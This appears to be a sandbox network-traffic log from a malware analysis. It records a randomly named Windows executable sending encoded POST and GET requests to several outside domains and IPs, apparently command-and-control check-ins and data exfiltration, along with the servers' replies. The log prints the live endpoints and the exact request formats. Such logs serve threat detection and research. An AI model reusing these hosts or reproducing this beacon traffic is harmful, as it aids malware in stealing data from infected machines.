                                                                          Nov 12, 2024 08:53:20.562227964 CET  691                IN         HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:20 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          18          192.168.2.4  49994        47.242.89.146   80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:22.155636072 CET  645                OUT        POST /1iqa/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          Origin: http://www.kdtzhb.top
                                                                          Referer: http://www.kdtzhb.top/1iqa/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT9oll6kyYM1fM59yCW8l5/+H0kBYUWW+ns=
                                                                          Nov 12, 2024 08:53:23.126152992 CET  691                IN         HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:22 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          19          192.168.2.4  50010        47.242.89.146   80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:24.696234941 CET  10727              OUT        POST /1iqa/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          Origin: http://www.kdtzhb.top
                                                                          Referer: http://www.kdtzhb.top/1iqa/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciGt7DsDoNduZDQ73l2g+IUyUe4I3zTo5J2XNkIJahacizdn09Ss8vySqx/QUfllNcgAlkA+jJNOEuv/oRk8UXsze8fJDhj7Tm8wqMXIXuFIMqnVnv41HU38qw9dnC0iYc6NntR23qqdcUVWkwiKkulZNrBmGk1mQqx5KMIlYnCZSiQnZrCCY3ptfxjfO/FzuCglgGEFKRU78cQ4qa7h7MlzUZyIkEaOp1s+SU2ss2/kF4Co8jdOxVwLf+ev0VISC3kKfj367ZBT4RlK5jhCDvvghEm0C250h8y5NVItmXtN8yv50hW/U8Ak7W+ytltD1GswlPpQ9JNlzOKNUUN35Wv/BrIUoVGB6logFYYrnuozTzXM4n+NcHlvtu42DzAqpv+Z0RGUDXEBYfAv15q80TyWy6vMmM5eyudAP81AR63e7jRTeQ5S5J6XYaRbc3NfiJruf0NBPmXVKwk3VKKjZxI8GJu2IlcxTI7EtbZgHeb1UwN5W1LdHhs6EkCpXZfsCVjZThMPTNsUutHKPmFcx90oeQR/keASxZAXFWHhTebwm1c+I9kKbnHW4WMkdJvGAWNPOY94QZqCRBhx7/LO3xXT4ZbeDZOjKGROYCtfNlXXf9m1CITfTMhaFJ4VBKBAYrMigF+ZHZXIPKnye/WTFFCq79FVliL+6cs/tmlBRruUwgrbkkpNBF9WsFODCPMpnRnP/Oqu7kk915oufeBkiOMIiimzdRZfbokGECPrtrDTjgDc3qDWc1lcifyzRe/y63kf8Amxg3HSrlkCC7cLkK+waywRjVyzA72kLCzhv6xAIlVHUxB20BPh3yumthHapfA8G [TRUNCATED]
                                                                          Nov 12, 2024 08:53:25.927558899 CET  691                IN         HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          20          192.168.2.4  50023        47.242.89.146   80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:27.242064953 CET  370                OUT        GET /1iqa/?L2m0Zn=EIYp+2qno3OyA6JS9Y7uk1QSTQ5f7vCBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhVH33IbkgUmM7v94zdg8dOLyK52Qf4FB6p0=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:28.208312035 CET  691                IN         HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:28 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 548
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          21          192.168.2.4  50024        128.65.195.180  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:33.626616955 CET  631                OUT        POST /293d/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          Origin: http://www.evoo.website
                                                                          Referer: http://www.evoo.website/293d/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842MBML0r3zIz2fOsHDR4XPFKQixSC0jUyOg==
                                                                          Nov 12, 2024 08:53:35.149131060 CET  458                IN         HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:35 GMT
                                                                          Server: Apache/2.4.25 (Debian)
                                                                          Content-Length: 278
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          22          192.168.2.4  50025        128.65.195.180  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:36.188538074 CET  651                OUT        POST /293d/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          Origin: http://www.evoo.website
                                                                          Referer: http://www.evoo.website/293d/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFuj/2b25gp7VkxF7CXWaJI+gubykrlcBds=


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          23          192.168.2.4  50026        128.65.195.180  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:38.728894949 CET  10733              OUT        POST /293d/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          Origin: http://www.evoo.website
                                                                          Referer: http://www.evoo.website/293d/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn= [TRUNCATED]


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
24         | 192.168.2.4 | 50027       | 128.65.195.180 | 80               | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 12, 2024 08:53:41.626652002 CET | 372               | OUT       | GET /293d/?JPc=NBQdBBkPWTStX&L2m0Zn=7bOTn4s4CK+jD9Jyb+vO73Pd/AR3TsBOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRY9J7LzjC0OYPsgDdyhfDZaDgEJItAmmuk4= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.evoo.website
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 12, 2024 08:53:43.107496977 CET | 458               | IN        | HTTP/1.1 404 Not Found
Date: Tue, 12 Nov 2024 07:53:42 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 278
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
25         | 192.168.2.4 | 50028       | 217.70.184.50  | 80               | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 12, 2024 08:53:48.325061083 CET | 646               | OUT       | POST /vdvc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Host: www.astorg-group.info
Origin: http://www.astorg-group.info
Referer: http://www.astorg-group.info/vdvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuE+LizkUehULba/51TNtxyBA0tVp8e6sPw==
Nov 12, 2024 08:53:49.123608112 CET | 608               | IN        | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Tue, 12 Nov 2024 07:53:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
26         | 192.168.2.4 | 50029       | 217.70.184.50  | 80               | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 12, 2024 08:53:50.869549036 CET | 666               | OUT       | POST /vdvc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Host: www.astorg-group.info
Origin: http://www.astorg-group.info
Referer: http://www.astorg-group.info/vdvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jylzpqcdxdHlU/Dgt2/WQXErV/C59y81e1Y=
Nov 12, 2024 08:53:51.670789003 CET | 608               | IN        | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Tue, 12 Nov 2024 07:53:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
27         | 192.168.2.4 | 50030       | 217.70.184.50  | 80               | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 12, 2024 08:53:53.420595884 CET | 10748             | OUT       | POST /vdvc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
Cache-Control: max-age=0
Connection: close
Host: www.astorg-group.info
Origin: http://www.astorg-group.info
Referer: http://www.astorg-group.info/vdvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn= [TRUNCATED]
Nov 12, 2024 08:53:54.882843971 CET | 713               | IN        | HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 12 Nov 2024 07:53:54 GMT
Content-Type: text/html
Content-Length: 568
Connection: close
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 12, 2024 08:53:54.882913113 CET | 713               | IN        | HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 12 Nov 2024 07:53:54 GMT
Content-Type: text/html
Content-Length: 568
Connection: close
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 12, 2024 08:53:55.095855951 CET | 713               | IN        | HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 12 Nov 2024 07:53:54 GMT
Content-Type: text/html
Content-Length: 568
Connection: close
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
28         | 192.168.2.4 | 50031       | 217.70.184.50  | 80               | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 12, 2024 08:53:55.962591887 CET | 377               | OUT       | GET /vdvc/?L2m0Zn=5MdYmwdbGD0BDYmZXtqVosi+TlTx67ljMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReNcAXJ0cKe8GCCdvHCelE6JjJemFhTRqEaU=&JPc=NBQdBBkPWTStX HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.astorg-group.info
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 12, 2024 08:53:56.780817032 CET | 1236              | IN        | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Nov 2024 07:53:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self'; script-src 'nonce-c0750c50df504ad99b8ce8ab6b0add39';
Vary: Accept-Language
Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-c0750c50df504ad99b8ce8ab6b0add39';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
Nov 12, 2024 08:53:56.780832052 CET | 1236              | IN        | Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?sea
Nov 12, 2024 08:53:56.780843973 CET | 190               | IN        | Data Ascii: ('clicker').addEventListener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'astorg-group.info'); }); });</script></main></div> </body></html>0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
29         | 192.168.2.4 | 50032       | 3.33.130.190   | 80               | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:01.946830034 CET | 625               | OUT       | POST /0m8a/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Host: www.fiqsth.vip
Origin: http://www.fiqsth.vip
Referer: http://www.fiqsth.vip/0m8a/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYyU3v4525n8fz6gawRwGQIJI2cl2CQbmzg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:04.500427961 CET | 645 | OUT | POST /0m8a/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Cache-Control: max-age=0
Connection: close
Host: www.fiqsth.vip
Origin: http://www.fiqsth.vip
Referer: http://www.fiqsth.vip/0m8a/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: L2m0Zn=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIt7rbsCPTmvoh9kFFzJI4znnOzXQfyFLmc=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:07.046180010 CET | 10727 | OUT | POST /0m8a/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
Cache-Control: max-age=0
Connection: close
Host: www.fiqsth.vip
Origin: http://www.fiqsth.vip
Referer: http://www.fiqsth.vip/0m8a/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:09.665139914 CET | 370 | OUT | GET /0m8a/?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.fiqsth.vip
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 12, 2024 08:54:10.314495087 CET | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 12 Nov 2024 07:54:10 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:54:15.359469891 CET | 637 | OUT | POST /ezyn/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cache-Control: max-age=0
Connection: close
Host: www.bio-thymus.com
Origin: http://www.bio-thymus.com
Referer: http://www.bio-thymus.com/ezyn/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
